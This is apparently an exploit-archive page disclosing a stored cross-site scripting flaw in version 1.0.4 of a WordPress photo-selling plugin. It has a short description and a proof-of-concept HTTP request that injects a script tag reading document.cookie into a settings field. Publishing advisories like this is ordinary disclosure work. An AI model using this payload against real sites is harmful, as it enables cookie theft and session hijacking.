exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress NextGen Gallery Sell Photo 1.0.5 Cross Site Scripting

WordPress NextGen Gallery Sell Photo 1.0.5 Cross Site Scripting
Posted Aug 16, 2020
Authored by Melbin K Mathew

WordPress NextGen Gallery Sell Photo plugin version 1.0.5 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | b7ac390a03c98ac9ada5906279c0380b35000a27c569945f9a804bc9066935cf

WordPress NextGen Gallery Sell Photo 1.0.5 Cross Site Scripting

Change Mirror Download
# Exploit Title: Wordpress Plugin NextGen Gallery Sell Photo 1.0.5 - Persistent Cross-Site Scripting
# Date: 2020-08-14
# Vendor Homepage: https://noorsplugin.com/
# Vendor Changelog: https://wordpress.org/plugins/nextgen-gallery-sell-photo/#developers
# Exploit Author: Melbin K Mathew (@melbinkm)
# Author Advisory: https://melbin.in/2020/08/14/stored-xss-vulnerability-in-wordpress-nextgen-gallery-sell-photo-plugin/
# Author Homepage: https://melbin.in
# Version: 1.0.4 and below

1. Description

The NextGen Gallery Sell Photo is a WordPress Plugin used to sell images directly from NextGen Gallery in WordPress blog with PayPal. The 'Button Text/Image' field in Settings page of Sell Photos Plugin was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. It is triggered when a users loads a page where the plugin is used, and when an admin opens settings page of the plugin. All WordPress websites using Sell Photo version 1.0.4 and below are affected.

2. Proof of Concept

POST /w/wp-admin/options-general.php?page=nextgen-sell-photo-settings HTTP/1.1
Host: 127.0.0.1
Content-Length: 336
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=nextgen-sell-photo-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close

_wpnonce=a48671c8bf&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dnextgen-sell-photo-settings&paypal_email=john%40zopmail.com&currency_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&return_url=http%3A%2F%2F95.217.19.38%2Fw&ngsp_update_settings=Save+Changes
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close